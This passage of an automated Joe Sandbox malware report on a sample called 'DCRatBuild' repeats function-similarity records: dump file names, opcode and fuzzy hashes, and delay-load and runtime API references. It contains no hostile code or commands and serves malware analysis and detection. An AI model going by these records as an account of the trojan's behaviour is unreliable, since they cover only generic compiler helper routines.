                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 8f451ef56aca056d701983baf7fc0bba344ffff21f78a7b3323dae1c2a0022bb
                                                                                                                        • Instruction ID: e53d61047aab310b4de45dcf52138d563ebfdf2bfc86462f64f209690bd81334
                                                                                                                        • Opcode Fuzzy Hash: 8f451ef56aca056d701983baf7fc0bba344ffff21f78a7b3323dae1c2a0022bb
                                                                                                                        • Instruction Fuzzy Hash: A6B012C5B581007C318861976E03E37011CC1D6B19330862FF428C2080E84C0C41053E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 4b3af0f87d45d4cd2a545adeaedba49413f8fb32c1792bb94f8f223e4de9dc19
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 4b3af0f87d45d4cd2a545adeaedba49413f8fb32c1792bb94f8f223e4de9dc19
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: cd25c7d5cc1c419936256de1c4d6c5716938c141e48b194279b3587406ba7a0f
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: cd25c7d5cc1c419936256de1c4d6c5716938c141e48b194279b3587406ba7a0f
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 12c291c04a838c258caa20ff37802f98370324226f08fbf8122ce22f6b560efd
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 12c291c04a838c258caa20ff37802f98370324226f08fbf8122ce22f6b560efd
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: a13ab1ec20f42343648428da198abaac3d7bc9055a4ec0ffeb583d61816759f6
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: a13ab1ec20f42343648428da198abaac3d7bc9055a4ec0ffeb583d61816759f6
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 937fc82a8bf547d28d48fe74da7869b6cfe4313b9b369a82b927c5010c1f405c
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: 937fc82a8bf547d28d48fe74da7869b6cfe4313b9b369a82b927c5010c1f405c
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 10a2094f7bdc777a3f115d02d28546ef40f0c8a3a36e58921d106537a131b89f
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: 10a2094f7bdc777a3f115d02d28546ef40f0c8a3a36e58921d106537a131b89f
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 9e25f4bc439d2fdbf654ca51f9335576284fb371ae4605293afd6135f7fd88df
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: 9e25f4bc439d2fdbf654ca51f9335576284fb371ae4605293afd6135f7fd88df
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: b01145e155bc42b1a54a4532233bf0cea8ddbe5e1df7f26adfa002df1a3b6e44
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: b01145e155bc42b1a54a4532233bf0cea8ddbe5e1df7f26adfa002df1a3b6e44
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 3770a1d446b389e866dfb1a962fbaf749066de8bc20e5d4865b7a53ec9d321bf
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: 3770a1d446b389e866dfb1a962fbaf749066de8bc20e5d4865b7a53ec9d321bf
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 897fae13da712df572466ac49518156f3aff464a7d592df247e24f06040eaecd
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: 897fae13da712df572466ac49518156f3aff464a7d592df247e24f06040eaecd
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 4e475341e4bcc868b80bbb4bc3208716f2710a2011bb1918a6c86fd22ca7a4b4
• Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
• Opcode Fuzzy Hash: 4e475341e4bcc868b80bbb4bc3208716f2710a2011bb1918a6c86fd22ca7a4b4
• Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 30bff3ab0c027b4cf0889fb735026935ef6b75688cc586fd2b96ac385f79dfce
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: 30bff3ab0c027b4cf0889fb735026935ef6b75688cc586fd2b96ac385f79dfce
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 4727c7b6a86ce55a5cc090027630b5fdc7eba910fae43cf2d5e1dbead56ccc73
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: 4727c7b6a86ce55a5cc090027630b5fdc7eba910fae43cf2d5e1dbead56ccc73
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 9639a641e994a735b7d12303ce0e8380cfb976a6d47a69e28bdcd2d6ebfae3f9
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: 9639a641e994a735b7d12303ce0e8380cfb976a6d47a69e28bdcd2d6ebfae3f9
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: c12bc3641687dbc650cc512fd1469dd70c8e0cc9187567eb532a87105bc3a532
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: c12bc3641687dbc650cc512fd1469dd70c8e0cc9187567eb532a87105bc3a532
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 76ac8d4302d32431c7f42059ef7ea1093152d949d87785229fd5c7d0d7f4c8fa
                                                                                                                        • Instruction ID: 0a7d6e424a8176da76fd721f698b49ab2baa141fa15af3fdeb47cbd3d67c5869
                                                                                                                        • Opcode Fuzzy Hash: 76ac8d4302d32431c7f42059ef7ea1093152d949d87785229fd5c7d0d7f4c8fa
                                                                                                                        • Instruction Fuzzy Hash: 49A011CAAA80003C300822A32E02E3B020CC0E2B2A3308A2FF82882080A88C0802083E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: bc82e31cc4b92abf23cfac6b219e491d856b4d08c78b3853b5295703762cdf6b
                                                                                                                        • Instruction ID: ca29e70e9e5d5feca07db713aa72ab34abf2e628277f0c2838a01e3bbf3d993c
                                                                                                                        • Opcode Fuzzy Hash: bc82e31cc4b92abf23cfac6b219e491d856b4d08c78b3853b5295703762cdf6b
                                                                                                                        • Instruction Fuzzy Hash: AFA012C5A580017C300821932D02D37010CC0D6B18330481FF42581080684C0801043D
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: e9cc630b598c6983175e4d51adb2a307e9215d00c0e0308da59c1c27f3811ba3
                                                                                                                        • Instruction ID: ca29e70e9e5d5feca07db713aa72ab34abf2e628277f0c2838a01e3bbf3d993c
                                                                                                                        • Opcode Fuzzy Hash: e9cc630b598c6983175e4d51adb2a307e9215d00c0e0308da59c1c27f3811ba3
                                                                                                                        • Instruction Fuzzy Hash: AFA012C5A580017C300821932D02D37010CC0D6B18330481FF42581080684C0801043D
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004BB7BB: GetOEMCP.KERNEL32(00000000,?,?,004BBA44,?), ref: 004BB7E6
